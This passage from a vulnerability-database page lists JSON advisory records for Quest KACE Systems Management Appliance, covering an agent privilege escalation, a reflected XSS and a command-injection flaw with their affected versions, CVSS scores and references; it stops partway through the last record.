Search criteria
17 vulnerabilities found for KACE Systems Management Appliance by Quest
CVE-2025-26850 (GCVE-0-2025-26850)
Vulnerability from cvelistv5 – Published: 2025-07-04 00:00 – Updated: 2025-07-08 14:36- CWE-863 - Incorrect Authorization
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Quest | KACE Systems Management Appliance |
Affected:
0 , < 14.0.97
(custom)
Affected: 14.1.0 , < 14.1.19 (custom) |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-26850",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-07-08T13:16:37.291128Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-07-08T14:36:07.987Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "KACE Systems Management Appliance",
"vendor": "Quest",
"versions": [
{
"lessThan": "14.0.97",
"status": "affected",
"version": "0",
"versionType": "custom"
},
{
"lessThan": "14.1.19",
"status": "affected",
"version": "14.1.0",
"versionType": "custom"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:quest:kace_systems_management_appliance:*:*:*:*:*:*:*:*",
"versionEndExcluding": "14.0.97",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:quest:kace_systems_management_appliance:*:*:*:*:*:*:*:*",
"versionEndExcluding": "14.1.19",
"versionStartIncluding": "14.1.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "The agent in Quest KACE Systems Management Appliance (SMA) before 14.0.97 and 14.1.x before 14.1.19 potentially allows privilege escalation on managed systems."
}
],
"metrics": [
{
"cvssV3_1": {
"baseScore": 9.3,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-863",
"description": "CWE-863 Incorrect Authorization",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-07-04T23:17:16.346Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://support.quest.com/kb/4378559/quest-response-to-kace-sma-agent-vulnerability-cve-2025-26850"
}
],
"x_generator": {
"engine": "enrichogram 0.0.1"
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2025-26850",
"datePublished": "2025-07-04T00:00:00.000Z",
"dateReserved": "2025-02-16T00:00:00.000Z",
"dateUpdated": "2025-07-08T14:36:07.987Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2025-26850 (GCVE-0-2025-26850)
Vulnerability from nvd – Published: 2025-07-04 00:00 – Updated: 2025-07-08 14:36- CWE-863 - Incorrect Authorization
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Quest | KACE Systems Management Appliance |
Affected:
0 , < 14.0.97
(custom)
Affected: 14.1.0 , < 14.1.19 (custom) |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-26850",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-07-08T13:16:37.291128Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-07-08T14:36:07.987Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "KACE Systems Management Appliance",
"vendor": "Quest",
"versions": [
{
"lessThan": "14.0.97",
"status": "affected",
"version": "0",
"versionType": "custom"
},
{
"lessThan": "14.1.19",
"status": "affected",
"version": "14.1.0",
"versionType": "custom"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:quest:kace_systems_management_appliance:*:*:*:*:*:*:*:*",
"versionEndExcluding": "14.0.97",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:quest:kace_systems_management_appliance:*:*:*:*:*:*:*:*",
"versionEndExcluding": "14.1.19",
"versionStartIncluding": "14.1.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "The agent in Quest KACE Systems Management Appliance (SMA) before 14.0.97 and 14.1.x before 14.1.19 potentially allows privilege escalation on managed systems."
}
],
"metrics": [
{
"cvssV3_1": {
"baseScore": 9.3,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-863",
"description": "CWE-863 Incorrect Authorization",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-07-04T23:17:16.346Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://support.quest.com/kb/4378559/quest-response-to-kace-sma-agent-vulnerability-cve-2025-26850"
}
],
"x_generator": {
"engine": "enrichogram 0.0.1"
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2025-26850",
"datePublished": "2025-07-04T00:00:00.000Z",
"dateReserved": "2025-02-16T00:00:00.000Z",
"dateUpdated": "2025-07-08T14:36:07.987Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
VAR-201905-1144
Vulnerability from variot - Updated: 2023-12-18 14:05An issue was discovered in Quest KACE Systems Management Appliance before 9.1. The script at /service/kbot_service_notsoap.php is vulnerable to unauthenticated reflected XSS when user-supplied input to the METHOD GET parameter is processed by the web application. Since the application does not properly validate and sanitize this parameter, it is possible to place arbitrary script code into the context of the same page. QuestSoftwareKACESystemsManagementAppliance is a system management device from QuestSoftware, USA. The product supports IT asset management, server management and monitoring, software license management and patch management. A cross-site scripting vulnerability exists in QuestSoftwareKACESystemsManagementAppliance 9.0 and earlier that could allow an attacker to execute client-side code
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201905-1144",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "kace systems management appliance",
"scope": "lt",
"trust": 1.8,
"vendor": "quest",
"version": "9.1"
},
{
"model": "software kace systems management appliance",
"scope": "lte",
"trust": 0.6,
"vendor": "quest",
"version": "\u003c=9.0"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-25506"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-004947"
},
{
"db": "NVD",
"id": "CVE-2019-11604"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:quest:kace_systems_management_appliance:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "9.1",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2019-11604"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Julien Ahrens",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201905-976"
}
],
"trust": 0.6
},
"cve": "CVE-2019-11604",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2019-11604",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CNVD-2019-25506",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.1,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2019-11604",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2019-11604",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2019-25506",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201905-976",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-25506"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-004947"
},
{
"db": "NVD",
"id": "CVE-2019-11604"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-976"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An issue was discovered in Quest KACE Systems Management Appliance before 9.1. The script at /service/kbot_service_notsoap.php is vulnerable to unauthenticated reflected XSS when user-supplied input to the METHOD GET parameter is processed by the web application. Since the application does not properly validate and sanitize this parameter, it is possible to place arbitrary script code into the context of the same page. QuestSoftwareKACESystemsManagementAppliance is a system management device from QuestSoftware, USA. The product supports IT asset management, server management and monitoring, software license management and patch management. A cross-site scripting vulnerability exists in QuestSoftwareKACESystemsManagementAppliance 9.0 and earlier that could allow an attacker to execute client-side code",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-11604"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-004947"
},
{
"db": "CNVD",
"id": "CNVD-2019-25506"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-11604",
"trust": 3.0
},
{
"db": "PACKETSTORM",
"id": "153053",
"trust": 3.0
},
{
"db": "JVNDB",
"id": "JVNDB-2019-004947",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2019-25506",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201905-976",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-25506"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-004947"
},
{
"db": "NVD",
"id": "CVE-2019-11604"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-976"
}
]
},
"id": "VAR-201905-1144",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-25506"
}
],
"trust": 1.225
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-25506"
}
]
},
"last_update_date": "2023-12-18T14:05:09.135000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "KACE Systems Management Appliance",
"trust": 0.8,
"url": "https://www.quest.com/jp-ja/products/kace-systems-management-appliance/"
},
{
"title": "Patch for QuestSoftwareKACESystemsManagementAppliance Cross-Site Scripting Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/172815"
},
{
"title": "Quest Software KACE Systems Management Appliance Fixes for cross-site scripting vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=92928"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-25506"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-004947"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-976"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-004947"
},
{
"db": "NVD",
"id": "CVE-2019-11604"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.6,
"url": "http://packetstormsecurity.com/files/153053/quest-kace-systems-management-appliance-9.0-cross-site-scripting.html"
},
{
"trust": 2.2,
"url": "http://seclists.org/fulldisclosure/2019/may/40"
},
{
"trust": 2.2,
"url": "https://www.rcesecurity.com/"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-11604"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-11604"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-25506"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-004947"
},
{
"db": "NVD",
"id": "CVE-2019-11604"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-976"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2019-25506"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-004947"
},
{
"db": "NVD",
"id": "CVE-2019-11604"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-976"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-08-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-25506"
},
{
"date": "2019-06-12T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-004947"
},
{
"date": "2019-05-24T17:29:02.633000",
"db": "NVD",
"id": "CVE-2019-11604"
},
{
"date": "2019-05-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201905-976"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-08-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-25506"
},
{
"date": "2019-06-12T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-004947"
},
{
"date": "2019-05-29T23:54:03.683000",
"db": "NVD",
"id": "CVE-2019-11604"
},
{
"date": "2019-05-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201905-976"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201905-976"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Quest Software KACE Systems Management Appliance Cross-Site Scripting Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-25506"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-976"
}
],
"trust": 1.2
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201905-976"
}
],
"trust": 0.6
}
}
VAR-202003-0967
Vulnerability from variot - Updated: 2023-12-18 13:47service/krashrpt.php in Quest KACE K1000 Systems Management Appliance before 6.4 SP3 (6.4.120822) allows a remote attacker to execute code via shell metacharacters in the kuid parameter. Quest KACE K1000 Systems Management An injection vulnerability exists in the appliance.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Quest Software KACE K1000 Systems Management Appliance (KACE SMA) is a system management device from Quest Software, USA.
The service / krashrpt.php file in Quest Software KACE SMA 6.4 SP3 (6.4.120822) and earlier versions has a security vulnerability
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202003-0967",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "kace systems management",
"scope": "lt",
"trust": 1.0,
"vendor": "quest",
"version": "6.4.120822"
},
{
"model": "kace systems management appliance",
"scope": "eq",
"trust": 0.8,
"vendor": "quest",
"version": "6.4 sp3 (6.4.120822)"
},
{
"model": "software quest software kace systems management appliance sp3",
"scope": "lt",
"trust": 0.6,
"vendor": "quest",
"version": "6.4(6.4.120822)"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-16728"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-014852"
},
{
"db": "NVD",
"id": "CVE-2019-20504"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:quest:kace_systems_management:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "6.4.120822",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2019-20504"
}
]
},
"cve": "CVE-2019-20504",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2019-014852",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2020-16728",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULMON",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2019-20504",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "HIGH",
"trust": 0.1,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2019-014852",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2019-20504",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "JVNDB-2019-014852",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNVD",
"id": "CNVD-2020-16728",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202003-387",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULMON",
"id": "CVE-2019-20504",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-16728"
},
{
"db": "VULMON",
"id": "CVE-2019-20504"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-014852"
},
{
"db": "NVD",
"id": "CVE-2019-20504"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-387"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
